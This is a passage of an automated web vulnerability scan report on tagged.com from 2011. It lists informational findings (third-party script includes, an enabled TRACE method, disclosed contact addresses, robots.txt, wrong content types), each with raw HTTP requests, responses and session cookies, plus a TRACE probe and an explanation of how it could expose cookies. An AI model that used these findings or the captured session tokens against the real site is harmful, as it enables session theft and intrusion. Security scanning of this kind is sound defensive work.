<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

6.5. http://www.tagged.com/help.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /help.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /help.html?topic=report-abuse HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:51:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11083

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet" type="text/css" hr
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/l/ve7DR8PhD.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://x.tagstat.com/dyn/js/q/qdsqITOM2.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/n/gWbftmKyb.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/P/kr3gYHFdj.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/R/Y8wZ9Qxkg.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/0/yXslsH7g-.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/6/SpleOKwIo.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/Z/exo2C4vRP.js"></script>
<!-- Begin quantserve -->
<script type="text/javascript" src="//edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Begin recaptcha -->
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

6.6. http://www.tagged.com/realtime_iframe.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /realtime_iframe.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /realtime_iframe.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/forgot_password.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:37 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 1580
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script src="http://code.jquery.com/jquery-1.5.2.js"></script>
<script type
...[SNIP]...

6.7. http://www.tagged.com/safety.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /safety.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /safety.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:51:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16421

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Safety, Security, and Privacy Overview</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/l/ve7DR8PhD.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://x.tagstat.com/dyn/js/q/qdsqITOM2.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/n/gWbftmKyb.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/P/kr3gYHFdj.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/R/Y8wZ9Qxkg.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/0/yXslsH7g-.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/6/SpleOKwIo.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/Z/exo2C4vRP.js"></script>
<!-- Begin quantserve -->
<script type="text/javascript" src="//edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Begin recaptcha -->
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

6.8. http://www.tagged.com/terms_of_service.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /terms_of_service.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /terms_of_service.html? HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 68504

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Terms of Service</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet"
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/l/ve7DR8PhD.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://x.tagstat.com/dyn/js/4/u3cAot00_.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/P/kr3gYHFdj.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/R/Y8wZ9Qxkg.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/D/j65ssQYsf.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/6/SpleOKwIo.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/Z/exo2C4vRP.js"></script>
<!-- Begin quantserve -->
<script type="text/javascript" src="//edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Begin recaptcha -->
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

7. TRACE method is enabled  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: www.tagged.com
Cookie: 5758575e054748f0

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:12 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tagged.com
Cookie: 5758575e054748f0; S=n1p0qgpt6cmo6i22240vdtb4s2; B=b=9C748D0299747383; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532;
...[SNIP]...

8. Email addresses disclosed  previous  next
There are 2 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


8.1. http://www.tagged.com/safety.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /safety.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /safety.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:51:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:00 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16421

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Safety, Security, and Privacy Overview</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<
...[SNIP]...
<a href="mailto:safetysquad@tagged.com">
...[SNIP]...
<a href="mailto:parentcare@tagged.com">parentcare@tagged.com</a>
...[SNIP]...
<a href="mailto:lawenforcement@tagged.com">lawenforcement@tagged.com</a>
...[SNIP]...
<a href="mailto:safetysquad@tagged.com">safetysquad@tagged.com</a>
...[SNIP]...

8.2. http://www.tagged.com/terms_of_service.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /terms_of_service.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /terms_of_service.html? HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 68504

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Terms of Service</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet"
...[SNIP]...
<a href="mailto:copyrightagent@tagged.com">copyrightagent@tagged.com</a>
...[SNIP]...
<a href="mailto:parentcare@tagged.com">parentcare@tagged.com</a>
...[SNIP]...

9. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.tagged.com

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:12 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2011 17:13:08 GMT
ETag: "29eed2-1214-49b4fc34a7100"
Accept-Ranges: bytes
Content-Length: 4628
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

#########################################################################
# /robots.txt file for http://www.tagged.com/
# mail webmaster@tagged.com for constructive criticism
#########################
...[SNIP]...

10. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


10.1. http://www.tagged.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

POST /api/?application_id=user&format=json&session_token=n1p0qgpt6cmo6i22240vdtb4s2 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/forgot_password.html
Content-Length: 299
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; B=b=9C748D0299747383; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)


method=tagged.header.renderAlerts&callback=tagged.header.alerts.show&api_signature=&track=MOtcjLSocm
method=tagged.util.echoIt&data=&callback=tagged.header.alerts.init&api_signature=&track=MOtcjLSocm
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:37 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 222
Content-Type: text/html; charset=UTF-8

["{\"stat\":\"ok\",\"diagnostics\":\"0 1.9 24.104\",\"result\":{\"HTML\":\"\"}}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.0 24.104\",\"result\":\"\"}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.0 24.104\"
...[SNIP]...

10.2. http://www.tagged.com/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tagged.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; B=b=9C748D0299747383; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:11 GMT
Server: Apache
Last-Modified: Fri, 11 Jun 2010 16:40:44 GMT
ETag: "2ceaeb-57e-488c3ccdedb00"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .......................................PPP.ddd.........ppp.NNN.........ooo.@@@.........................000...............................................................
...[SNIP]...

Report generated by XSS.CX at Thu Jul 14 07:12:36 CDT 2011.